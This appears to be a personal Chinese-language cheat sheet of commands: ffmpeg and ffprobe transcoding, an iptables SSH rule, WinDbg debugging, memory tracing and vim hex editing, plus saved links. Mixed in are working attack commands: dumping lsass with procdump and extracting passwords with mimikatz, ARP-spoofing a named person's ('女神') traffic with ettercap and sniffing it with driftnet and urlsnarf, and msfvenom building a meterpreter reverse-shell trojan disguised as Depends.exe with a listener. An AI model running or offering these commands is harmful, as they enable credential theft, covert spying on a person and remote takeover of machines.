ffmpeg命令收集

转码
ffmpeg.exe -i %1 -vcodec h264 -s 1920x1080 -g 10 output.avi

转格式
ffmpeg.exe -i %1 -vcodec copy output.avi

改码率
ffmpeg -i in.avi -b 512K out.mp4

改文件大小
ffmpeg -i input.avi -fs 10MB output.mp4

看GOP
ffprobe.exe -show_frames 62_g10.avi | grep key_frame > 62_g10_k.txt
ffprobe.exe -show_frames 62_g10.avi | grep pict_type > 62_g10.txt
ffprobe.exe -show_frames -of xml sample.mp4 > probe.xml

只允许67访问
iptables -I INPUT -p tcp --dport 22 -j DROP; iptables -I INPUT -s 192.168.1.67 -p tcp --dport 22 -j ACCEPT
iptables-save

ssh与redis
https://www.toutiao.com/a6649866429325640205/

深度强化学习
https://github.com/keon/deep-q-learning
https://www.toutiao.com/a6664790347987550733/

MFC子窗口和父窗口
https://www.cnblogs.com/BeyondTechnology/archive/2011/03/25/1995934.html

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
https://www.toutiao.com/a6674094119448478220/

基于文件过滤驱动的透明加密那点事儿
https://blog.csdn.net/orbit/article/details/9907335

1
2
3
4
5
6
#include <mcheck.h>
void mtrace(void);
void muntrace(void);
MALLOC_TRACE=out.log ./a.out
LD_DEBUG=help ./a.out
mtrace a.out out.log

https://blog.csdn.net/tsvico/article/details/79248788
echo 1 > /proc/sys/net/ipv4/ip_forward
zenmap
ettercap -G
女神的IP设置为目标1,路由器的IP设置为目标2
driftnet -i wlan0
urlsnarf -i wlan0
ufw disable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b '\x00' -x Depends.exe -f exe -o MyDepends2.exe
msfconsole
use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.69
run
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.37 lport=4444 -f exe -o shell_stageless.exe

bat脚本获取当前文件所在目录
https://blog.csdn.net/tsvico/article/details/78050884

windbg
SRV*c:\temp*http://msdl.microsoft.com/download/symbols
!analyze -v
.load wow64exts
!sw
!heap –x 00ca3480
ub 0118188e L20
~2 s
k
dv
x MyModule!MyClass*
dps 014cb558
dt /b this
s -d 0 L?80000000 0x00cd5740
dt 0029f8b8 impClass
s -u 10000 L8000000 "hello"
!address 0728988a
.writemem d:\dump.txt 07288600 L2000
kdbgctrl -db
kdbgctrl -e
kd -kl
.reload
dt _DRIVER_OBJECT
u nt!ZwOpenKey
!process 0 0
dt nt!_eprocess
!irpfind
!pcr

二进制编辑
vim -b datafile
:%!xxd
R
:%!xxd -r
isatap Teredo

ulimit -c unlimited
echo "/tmp/core-%e-%p" > /proc/sys/kernel/core_pattern

/verbose:lib